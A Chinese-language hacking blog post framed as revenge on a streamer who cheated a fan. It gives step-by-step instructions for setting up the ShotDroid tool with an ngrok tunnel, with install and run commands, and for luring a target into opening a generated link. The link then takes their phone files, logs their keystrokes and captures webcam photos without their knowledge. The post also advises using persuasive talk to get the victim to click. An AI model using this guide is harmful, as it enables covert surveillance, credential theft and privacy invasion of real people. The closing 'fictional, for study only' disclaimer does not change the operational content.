当你为某位网红小姐姐一掷千金,刷了20几个W。结果对方是个抠脚大汉,你的心情会是怎样的?事情的起源是这样的,某位粉丝留言说自己在某平台给小姐姐刷礼物,刷了20W,感觉自己被骗了,让我帮帮他,于是便有了这篇文章!

思路

我们可以给对方生成一条链接,诱骗器打开!当期打开链接后,便可以获取对方手机的信息,如摄像头,相册文件,键盘记录等等。
而利用Android肾透神器ShotDroid 便能很方便的解决这个问题!

ShotDroid 功能

  • 隐藏安卓应用。
  • 自定义文件目录。
  • 基于Android的键盘记录
  • 利用html 模板获取面部网络摄像头。

安装

首先安装依赖环境

apt install zenity xterm


安装ngrok
ngrok是一款优秀的内网映射工具,可以方便的让不在同一局域网内的设备进行访问。

curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok

由于网络原因 安装过程可能有点慢

配置ngrok

登录ngrok的官网进行注册ngrok.com
注册完成后,访问https://dashboard.ngrok.com/get-started/your-authtoken获取api

然后再kali中执行下面命令,添加密匙

ngrok config add-authtoken 2DEuwA***************1eRSym

部署项目

git clone https://github.com/kp300/shotdroid.git
cd shotdroid

启动

bash shotdroid.sh


参数说明:

  • Android Files 获取手机文件
  • Android Keylogger 获取键盘记录
  • Take Face Webcam 获取摄像头

    获取手机文件

    由于部分机型对手机权限的问题,有可能会失败。最好是root后的手机测试。

    获取摄像头


    注意,生成的ngrok链接不能复制,访问http://127.0.0.1:4040便可以复制了

    访问链接后,效果如下,当然页面你可以自定义!

    允许摄像头后,照片会保存!

总结

利用ShotDroid可以便捷的对诈骗者进行肾透。但成功与否,还需要你的花言巧语诱导其点击链接。当然程序本身也有一定的缺陷,如网络问题不是很友好!
最后,本文纯属虚构。技术仅限学习和研究,请勿非法恶意攻击他人。

Kali黑客笔记一键关注
Last modification:August 14, 2022
正在沿街乞讨中……